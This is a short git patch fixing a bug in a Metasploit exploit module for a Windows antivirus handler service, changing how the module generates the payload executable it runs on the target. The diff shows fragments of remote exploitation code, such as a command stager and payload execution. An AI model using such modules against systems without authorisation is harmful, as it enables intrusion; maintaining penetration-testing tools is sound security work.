From 5cb8b9a20a1f4bd00aae892b0604f869a9b23e8a Mon Sep 17 00:00:00 2001 From: Sam Roth Date: Tue, 5 May 2015 22:25:06 -0400 Subject: [PATCH] Fix #5304 --- modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index f0da843b45..efed29d6fa 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::Tcp + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, @@ -53,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def windows_stager print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.' }) - @payload_exe = payload_exe + @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe)